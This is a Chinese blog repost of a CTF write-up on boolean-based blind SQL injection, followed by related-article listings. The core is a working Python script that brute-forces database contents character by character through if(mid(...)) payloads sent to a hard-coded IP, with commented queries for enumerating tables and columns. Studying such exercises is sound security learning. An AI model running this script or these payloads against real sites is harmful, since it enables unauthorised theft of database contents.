opcourse sql布尔盲注 WP复现

最新推荐文章于 2025-08-15 09:00:49 发布
转载 最新推荐文章于 2025-08-15 09:00:49 发布 · 132 阅读 · 0 ·
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/BOHB-yunying/p/10771654.html
文章标签:

#数据库

本文分享了一次SQL盲注实战经验,通过使用bool盲注法结合if+mid函数进行数据库爆破。作者详细记录了从脚本编写到调试优化的过程,强调了格式化字符串和代码整洁的重要性。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

当时做这题的时候,写了脚本,用的if(mid())<>来爆破的,可能因为写脚本不擅长,写的太乱了,直接把payload写进mid里,整个一堆,然后括号对着WP看的时候,少了好几个括号,导致爆破失败,真的臭FIVE。首先来复现一遍把

一般都是习惯性查看源代码,

其实就是过滤了一些函数和and,=等  ,这些被过滤的话,而且对应着

 

 我一开始想到的就是bool盲注,用if(0,1,2),if(1,1,2)测试过。然后一般是有两种尝试方式,一种是ascii+substr或者if+mid。我一开始就是选择的if+mid,但是爆破不出来,语句括号问题,所以这里提醒大家,能看起来简洁就简介,多使用格式化字符串,我以前都是用%,发现format很好用,3.6新加了字符串前f的格式化字符串(百度)。越简洁越好,看起来清爽

呢么上脚本

import requests
str = "A109"
url = "http://212.64.20.100/?id="
database = ''
#payload='database()'
#payload ="select group_concat(table_name separator '@') from information_schema.tables where table_schema like database()"
#payload ='select group_concat(column_name) from information_schema.columns where table_name like 0x666c3467'
payload ='select fl4g from fl4g'
print('start')
for i in range(1,100):
    for w in range(48,127):
        key={'id':"if((mid(({}),{},1)<>'{}'),1,2)".format(payload,i,chr(w))}
        res = requests.get(url,params=key).text
        print('............%s......%s.......'%(i,w))
        if str in res:
            database += chr(w)
            break
    print(database)

哎,可惜了。如果是3.6版本以上,你就可以直接

f"if((mid(({payload}),{i},1)<>'{chr(w)}'),1,2)"
很方便的哦,写脚本的时候,规范点,不要太乱,能先预制好的,可以先预制好。看起来也简洁,这样一看,上面的括号就看的清楚了,不至于把payload啥的全写进去,看的不清楚,容易漏
加油

转载于:https://www.cnblogs.com/BOHB-yunying/p/10771654.html

[第五空间 2021]web 复现wp
snowlyzz的博客
09-13 704
[第五空间 2021] wp
2024RCTF - web部分 wp
2201_75824562的博客
05-29 1742
2024RCTF 部分wp
[巅峰极客2023]wp复现
leekos的博客,分享web安全相关知识~
07-24 1091
简单的说,就是通过查询多个大的表,导致产生笛卡尔积,造成查询数量多,所以会产生延时的效果。没写出这题的原因,以为只能通过逃逸改变属性值,结果可以反序列化对象里的对象。都被过滤了,我们怎么才能够一边查询多表导致笛卡尔积,一边进行盲注呢?等等,普通的延时注入肯定不行,关键词都被ban了。对象的序列化字符串,由于对象成员变量的权限是。序列化后字符串的形式了,接下来我们只需要闭合。,这个是8进制的写法,然后编码之后就能转为。的字符,该字符不可见(也算作一个字符)可以重复14次,就逃逸出28个字符了,
hctf2018wp复现
weixin_30274627的博客
11-12 318
1、bottle 登陆网站后存在提交url的地方 测试发生存在如下paload,知识点:1、crlf 2、写一个网站开发的端口小于80,浏览器就不会跳转能执行js(payload只能在火狐浏览器执行): 验证码部分可以生成1-10000的Md5值 ,构造如下payload: 下面这个图就是打到自己的cookie。如果将这个payload提交到url那里,也就是...
LCTF wp简单复现
weixin_30502965的博客
11-20 310
1、T4lk 1s ch34p,sh0w m3 the sh31l 代码如下: <?php $SECRET = `../read_secret`; $SANDBOX = "../data/" . md5($SECRET. $_SERVER["REMOTE_ADDR"]); $FILEBOX = ...
2022蓝帽杯初赛密码wp复现
mxx307的博客
07-11 882
2022蓝帽杯密码题wp复现
CTF-Web-SQL注入
beihai2013
01-26 3494
题目目录参考https://ca01h.top/Web_security/ctf_writeup/8.buuctf%E5%88%B7%E9%A2%98%E2%80%94%E2%80%94XSS/ 随便注 题目来源:强网杯2019 题目链接:https://buuoj.cn/challenges#[%E5%BC%BA%E7%BD%91%E6%9D%AF%202019]%E9%9A%8F%E4%BE%BF%E6%B3%A8 考察:堆叠注入,sql的show语句,sql的预编译,sql修改表 参考:https:/
物业管理系统SQL优化术:5个步骤提升数据库操作效率
[物业管理系统SQL优化术:5个步骤提升数据库操作效率](https://www.shulanxt.com/wp-content/uploads/2021/05/image-6.png) # 摘要 本文全面探讨了物业管理系统中SQL基础及性能优化的关键问题。首先,针对数据库...
Kepserver连接SQL数据库:数据一致性保证【核心要点】与日志分析技术
[Kepserver连接SQL数据库:数据一致性保证【核心要点】与日志分析技术](https://media.geeksforgeeks.org/wp-content/uploads/20210618195216/Certifylocks1.jpg) # 摘要 本文全面介绍了Kepserver连接SQL数据库的...
【数据验证】确保KEPServerEX6至SQL Server的数据准确性和完整性
[【数据验证】确保KEPServerEX6至SQL Server的数据准确性和完整性](https://www.stellarinfo.com/blog/wp-content/uploads/2021/04/Double-click-Check-Database-Integrity-Task-5-1-1024x582.png) # 摘要 数据验证...
wp复现 【全国大学生信息安全初赛】报错+无列名SQL注入
这周末在做梦的博客
05-20 742
本次复现的目的在于掌握无列明注入的要点一,什么是无列名注入二,成品展示三,配置与代码 一,什么是无列名注入 二,成品展示 三,配置与代码
2022NCTF的部分wp复现
v2ish1yan的博客
12-14 820
2022NCTF的部分wp
CISCN2024 初赛 wp 部分复现(Re)
Pisces50002的博客
06-10 1627
成功率比较玄学,有的版本就不行,我用nexus5x真机也是会崩溃,这里是雷电9.0模拟的OPPO 9。字符串收集信息,可以猜测是利用seed生成randint、random之类的随机数进行了处理。密文长度是56,base64是3->4,转回来flag是42个字符(猜测)借助GPT对几个关键函数进行分析,忽略一些异常处理,看一下主要的逻辑。输入的内容base64编码之后,与通过randint生成的随机数异或。首先是unidbg的环境配置,这个特别麻烦,建议使用。讲的蛮好的,就是挺麻烦,基本功要求高。
CTFHub-布尔盲注-wp #(自制脚本做法)
z1moq的博客
05-15 3879
CTFHub布尔盲注脚本 # -*- coding: utf-8 -*- # @Time : 2021/5/15 21:33 # @Author : z1moq # @File : ctfhub布尔盲注.py # @Software: PyCharm import requests import string def get_database(url, mark): database = '' for i in range(1, 9): for j in string.a
通过SQL语句创建与管理数据表
weixin_44580139的博客
10-09 3831
通过SQL语句创建与管理数据表 实验环境:SQL server2017 表:依次是Student,Course,SC。 1.通过SQL语句创建表 用SQL语句创建Student表,Course表,SC表。 Student表:涉及空值约束,主键约束,默认值约束,均为列级完整性约束,可直接写在在对应列后面。 create table Student( Sno char(8) not null pr...
mysql bool盲注_bool盲注+各种姿势绕过过滤和替换
weixin_35019679的博客
01-27 1000
题目来源题目界面比较简单,只让你输入id,输对了告诉你 You are in,输错了就 You are not in可以想到这是一个盲注,经简单测试,提交字母a进不去,1可以。也就是说通过注入如果进去了,说明注入的语句成功执行,反之没有执行,典型的bool盲注bool盲注的一般思路一般来说,bool盲注通常是通过一位一位爆破字符来实现的,常用的函数如下:1234567891011121314151...
[GYCTF 2020] Web复现 wp
Alexhirchi的博客
07-30 1842
FlaskApp 要点:模板注入、Pin码 访问网站,提示了该网站由Flask框架搭建,进行简单测试,提供了base64加密和解密的功能,并开启了flask的dubug功能(输入错误的base64解码会出现报错界面) 猜测存在模板注入,构造payload:{{2+6}} base64加密,将结果进行解码,验证存在模板注入 构造payload获取python文件内容(通过之前的报错可以知道python文件名),循环查找catch_warnings,打开app.py读取内容 {% for c in []
MoonBit Perals Vol.05: 函数式里的依赖注入:Reader Monad
m0_74743788的博客
08-13 1525
普通的函数就像一个流水线,你丢进去一袋面粉,然后直接跑到生产线末端,等着方便面出来。但这条流水线需要自动处理中间的所有复杂情况:没放面粉/“没有下单,期待发货”(null)面团含水量不够把压面机干卡了(抛出异常)配料机需要读取今天的生产配方,比如是红烧牛肉味还是香菇炖鸡味(读取外部配置)流水线末端的打包机需要记录今天打包了多少包(更新计数器)Monad 就是专门管理这条复杂流水线的“总控制系统”。它把你的数据和处理流程的上下文一起打包,确保整个流程能顺畅、安全地进行下去。
如何在 Linux 上安装 SQL Server 2022 和 Azure Data Studio
最新发布
csdn_aspnet的专栏,请点击博客主页右上角三个点中的私信联系
08-15 1088
本文介绍了如何在Linux系统(以Ubuntu 20.04为例)上安装SQL Server 2022及Azure Data Studio。SQL Server自2017版开始支持Linux平台,通过平台抽象层实现跨平台兼容性。文章详细说明了安装步骤:导入GPG密钥、注册存储库、安装软件包并配置管理员密码。同时介绍了SQL Server在Linux上的不同版本(企业版、标准版等)和主要功能差异。安装完成后,用户可通过Azure Data Studio等工具进行连接管理,文中提供了连接参数设置指南。整个过程简便
墨者靶场sql布尔盲注
10-09
针对墨者靶场的 SQL 布尔盲注,你需要先了解 SQL 注入的基本概念和实现方式。在进行布尔盲注时,需要通过构造特定的 SQL 语句来判断数据库中是否存在某些数据或条件,从而实现注入攻击。以下是一些可能用到的注入...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值